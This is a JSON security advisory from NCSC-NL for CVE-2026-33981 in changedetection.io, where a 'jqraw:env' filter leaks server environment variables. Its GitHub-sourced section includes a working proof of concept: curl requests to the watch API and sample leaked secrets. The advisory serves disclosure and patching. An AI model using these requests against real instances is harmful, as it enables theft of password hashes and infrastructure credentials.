{ "document": { "category": "csaf_base", "csaf_version": "2.0", "distribution": { "tlp": { "label": "WHITE" } }, "lang": "en", "notes": [ { "category": "legal_disclaimer", "text": "The Netherlands Cyber Security Center (henceforth: NCSC-NL) maintains this portal to enhance access to its information and vulnerabilities. The use of this information is subject to the following terms and conditions:\n\nThe vulnerabilities disclosed in this portal are gathered by NCSC-NL from a variety of open sources, which the user can retrieve from other platforms. NCSC-NL makes every reasonable effort to ensure that the content of this portal is kept up to date, and that it is accurate and complete. Nevertheless, NCSC-NL cannot entirely rule out the possibility of errors, and therefore cannot give any warranty in respect of its completeness, accuracy or real-time keeping up-to-date. NCSC-NL does not control nor guarantee the accuracy, relevance, timeliness or completeness of information obtained from these external sources. The vulnerabilities disclosed in this portal are intended solely for the convenience of professional parties to take appropriate measures to manage the risks posed to the cybersecurity. No rights can be derived from the information provided therein.\n\nNCSC-NL and the Kingdom of the Netherlands assume no legal liability or responsibility for any damage resulting from either the use or inability of use of the vulnerabilities disclosed in this portal. This includes damage resulting from the inaccuracy of incompleteness of the information contained in it.\nThe information on this page is subject to Dutch law. All disputes related to or arising from the use of this portal regarding the disclosure of vulnerabilities will be submitted to the competent court in The Hague. This choice of means also applies to the court in summary proceedings." } ], "publisher": { "category": "coordinator", "contact_details": "cert@ncsc.nl", "name": "National Cyber Security Centre", "namespace": "https://www.ncsc.nl/" }, "title": "CVE-2026-33981", "tracking": { "current_release_date": "2026-04-02T15:27:36.118024Z", "generator": { "date": "2026-02-17T15:00:00Z", "engine": { "name": "V.E.L.M.A", "version": "1.7" } }, "id": "CVE-2026-33981", "initial_release_date": "2026-03-28T07:40:15.821070Z", "revision_history": [ { "date": "2026-03-28T07:40:15.821070Z", "number": "1", "summary": "CVE created.| Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| Products created (1).| References created (3).| CWES updated (1)." }, { "date": "2026-03-28T07:40:16.161063Z", "number": "2", "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| References created (3).| CWES updated (1)." }, { "date": "2026-03-28T07:40:21.191333Z", "number": "3", "summary": "NCSC Score created." }, { "date": "2026-03-28T07:41:24.235482Z", "number": "4", "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| References created (4).| CWES updated (1)." }, { "date": "2026-03-28T07:41:27.239716Z", "number": "5", "summary": "NCSC Score updated." }, { "date": "2026-03-28T07:43:08.118706Z", "number": "6", "summary": "NCSC Score updated." }, { "date": "2026-03-29T00:38:27.399267Z", "number": "7", "summary": "Source connected.| CVE status created. (valid)| EPSS created." }, { "date": "2026-03-29T00:38:29.011713Z", "number": "8", "summary": "NCSC Score updated." }, { "date": "2026-03-30T19:38:53.786479Z", "number": "9", "summary": "Unknown change." }, { "date": "2026-03-30T19:39:02.215570Z", "number": "10", "summary": "NCSC Score updated." }, { "date": "2026-03-30T20:47:08.213240Z", "number": "11", "summary": "References created (1)." }, { "date": "2026-04-01T06:59:05.105255Z", "number": "12", "summary": "Source connected.| CVE status created. (valid)| Description created for source.| Products created (1)." }, { "date": "2026-04-01T06:59:10.901498Z", "number": "13", "summary": "NCSC Score updated." }, { "date": "2026-04-02T15:27:28.006581Z", "number": "14", "summary": "CVSS created.| Products created (1).| Product Identifiers created (1).| Exploits created (1)." }, { "date": "2026-04-02T15:27:31.239943Z", "number": "15", "summary": "NCSC Score updated." } ], "status": "interim", "version": "15" } }, "product_tree": { "branches": [ { "branches": [ { "branches": [ { "category": "product_version_range", "name": "vers:unknown/<0.54.7", "product": { "name": "vers:unknown/<0.54.7", "product_id": "CSAFPID-5984930", "product_identification_helper": { "cpe": "cpe:2.3:a:webtechnologies:changedetection:*:*:*:*:*:*:*:*" } } } ], "category": "product_name", "name": "changedetection" } ], "category": "vendor", "name": "webtechnologies" }, { "branches": [ { "branches": [ { "category": "product_version_range", "name": "vers:unknown/<0.54.7", "product": { "name": "vers:unknown/<0.54.7", "product_id": "CSAFPID-5956293" } } ], "category": "product_name", "name": "changedetection.io" } ], "category": "vendor", "name": "dgtlmoon" }, { "branches": [ { "branches": [ { "category": "product_version_range", "name": "vers:unknown/<0.54.7", "product": { "name": "vers:unknown/<0.54.7", "product_id": "CSAFPID-5970765" } } ], "category": "product_name", "name": "changedetection.io" } ], "category": "vendor", "name": "unknown" } ] }, "vulnerabilities": [ { "cve": "CVE-2026-33981", "notes": [ { "category": "description", "text": "changedetection.io is a free open source web page change detection tool. Prior to 0.54.7, the `jq:` and `jqraw:` include filter expressions allow use of the jq `env` builtin, which reads all process environment variables and stores them as the watch snapshot. An authenticated user (or unauthenticated user when no password is set, the default) can leak sensitive environment variables including `SALTED_PASS`, `PLAYWRIGHT_DRIVER_URL`, `HTTP_PROXY`, and any secrets passed as env vars to the container. Version 0.54.7 patches the issue.", "title": "cveprojectv5 - https://raw.githubusercontent.com/CVEProject/cvelistV5/main/cves/2026/33xxx/CVE-2026-33981.json" }, { "category": "description", "text": "changedetection.io is a free open source web page change detection tool. Prior to 0.54.7, the `jq:` and `jqraw:` include filter expressions allow use of the jq `env` builtin, which reads all process environment variables and stores them as the watch snapshot. An authenticated user (or unauthenticated user when no password is set, the default) can leak sensitive environment variables including `SALTED_PASS`, `PLAYWRIGHT_DRIVER_URL`, `HTTP_PROXY`, and any secrets passed as env vars to the container. Version 0.54.7 patches the issue.", "title": "nvd - https://services.nvd.nist.gov/rest/json/cves/2.0?cveId=CVE-2026-33981" }, { "category": "description", "text": "### Summary\n\nThe `jq:` and `jqraw:` include filter expressions allow use of the jq `env` builtin, which reads all process environment variables and stores them as the watch snapshot. An authenticated user (or unauthenticated user when no password is set, the default) can leak sensitive environment variables including `SALTED_PASS`, `PLAYWRIGHT_DRIVER_URL`, `HTTP_PROXY`, and any secrets passed as env vars to the container.\n\n### Details\n\n**Vulnerable file:** `changedetectionio/html_tools.py`, lines 380-388\n\nUser-supplied jq filter expressions are compiled and executed without restricting dangerous jq builtins:\n\n```python\nif json_filter.startswith(\"jq:\"):\n jq_expression = jq.compile(json_filter.removeprefix(\"jq:\"))\n match = jq_expression.input(json_data).all()\n return _get_stripped_text_from_json_match(match)\n\nif json_filter.startswith(\"jqraw:\"):\n jq_expression = jq.compile(json_filter.removeprefix(\"jqraw:\"))\n match = jq_expression.input(json_data).all()\n return '\\n'.join(str(item) for item in match)\n```\n\nThe form validator at `forms.py:670-673` only checks that the expression compiles (`jq.compile(input)`) — it does not block dangerous functions. The jq `env` builtin reads all process environment variables regardless of the input data, returning a dictionary of every env var in the server process.\n\n### PoC\n\n**Step 1 — Create a watch for any JSON endpoint with `jqraw:env` as the include filter:**\n\n```bash\ncurl -X POST http://target:5000/api/v1/watch \\\n -H \"Content-Type: application/json\" \\\n -H \"x-api-key: \" \\\n -d '{\n \"url\": \"https://httpbin.org/json\",\n \"include_filters\": [\"jqraw:env\"],\n \"time_between_check\": {\"seconds\": 30}\n }'\n```\n\nIf no password or API key is set (the default), no authentication is needed.\n\n**Step 2 — Wait for the watch to be checked, or trigger a recheck:**\n\n```bash\ncurl \"http://target:5000/api/v1/watch/?recheck=true\" -H \"x-api-key: \"\n```\n\n**Step 3 — The processed text file on disk now contains all environment variables:**\n\n```\n{'SALTED_PASS': '...hashed password...', 'PLAYWRIGHT_DRIVER_URL': 'ws://browser:3000',\n 'HTTP_PROXY': 'socks5h://10.10.1.10:1080', 'SHELL': '/bin/bash',\n 'HOME': '/root', 'PATH': '...', 'WERKZEUG_SERVER_FD': '22',\n ... and all other env vars}\n```\n\nThe data is visible in the web UI when viewing the watch's latest snapshot, and is also included in notification messages if notifications are configured.\n\n**Confirmed on v0.54.6:** The processed text file stored 46 environment variables from the server process.\n\n### Impact\n\n- **Secret exposure:** Leaks `SALTED_PASS` (password hash used for authentication), enabling offline cracking or direct session forgery\n- **Infrastructure credential theft:** Leaks `PLAYWRIGHT_DRIVER_URL`, `WEBDRIVER_URL`, `HTTP_PROXY`/`HTTPS_PROXY`, database connection strings, and any API keys or tokens passed as environment variables\n- **Cascading access:** Leaked proxy credentials or browser automation URLs can be used to pivot into other internal systems\n- **Affects all deployments using jq:** Any instance where the Python `jq` module is installed (standard in Docker deployments) is vulnerable\n- **No authentication required by default:** changedetection.io ships with no password and the API accessible without a key, so this is exploitable by any user with network access in the default configuration", "title": "github - https://api.github.com/advisories/GHSA-58r7-4wr5-hfx8" }, { "category": "description", "text": "Affected versions of the changedetection.io package are vulnerable to Information Disclosure due to unrestricted use of the jq env builtin in user-supplied include filters. The changedetectionio/html_tools.py code path handling jq: and jqraw: filters compiles and executes attacker-controlled jq expressions, while the validator in forms.py only checks whether the expression compiles and does not block dangerous builtins such as env, which returns all process environment variables.", "title": "pyupio - https://raw.githubusercontent.com/pyupio/safety-db/refs/heads/master/data/insecure_full.json" }, { "category": "other", "text": "0.00016", "title": "EPSS" }, { "category": "other", "text": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:H/SI:N/SA:N", "title": "CVSSV4" }, { "category": "other", "text": "8.3", "title": "CVSSV4 base score" }, { "category": "other", "text": "3.3", "title": "NCSC Score" }, { "category": "other", "text": "Is related to (a version of) an uncommon product, There is exploit data available from source Nvd, Is related to a product by vendor Unknown", "title": "NCSC Score top decreasing factors" } ], "product_status": { "known_affected": [ "CSAFPID-5956293", "CSAFPID-5970765", "CSAFPID-5984930" ] }, "references": [ { "category": "external", "summary": "Source - cveprojectv5", "url": "https://raw.githubusercontent.com/CVEProject/cvelistV5/main/cves/2026/33xxx/CVE-2026-33981.json" }, { "category": "external", "summary": "Source - nvd", "url": "https://services.nvd.nist.gov/rest/json/cves/2.0?cveId=CVE-2026-33981" }, { "category": "external", "summary": "Source - github", "url": "https://api.github.com/advisories/GHSA-58r7-4wr5-hfx8" }, { "category": "external", "summary": "Source - first", "url": "https://api.first.org/data/v1/epss?limit=10000&offset=0" }, { "category": "external", "summary": "Source - pyupio", "url": "https://raw.githubusercontent.com/pyupio/safety-db/refs/heads/master/data/insecure_full.json" }, { "category": "external", "summary": "Reference - cveprojectv5; github; nvd", "url": "https://github.com/dgtlmoon/changedetection.io/security/advisories/GHSA-58r7-4wr5-hfx8" }, { "category": "external", "summary": "Reference - cveprojectv5; github; nvd", "url": "https://github.com/dgtlmoon/changedetection.io/commit/65517a9c74a0cbe1a4661314470b28131ef5557f" }, { "category": "external", "summary": "Reference - cveprojectv5; github; nvd", "url": "https://github.com/dgtlmoon/changedetection.io/releases/tag/0.54.7" }, { "category": "external", "summary": "Reference - github", "url": "https://github.com/advisories/GHSA-58r7-4wr5-hfx8" }, { "category": "external", "summary": "Reference - github", "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33981" } ], "scores": [ { "cvss_v3": { "version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM" }, "products": [ "CSAFPID-5956293", "CSAFPID-5970765", "CSAFPID-5984930" ] } ], "title": "CVE-2026-33981" } ] }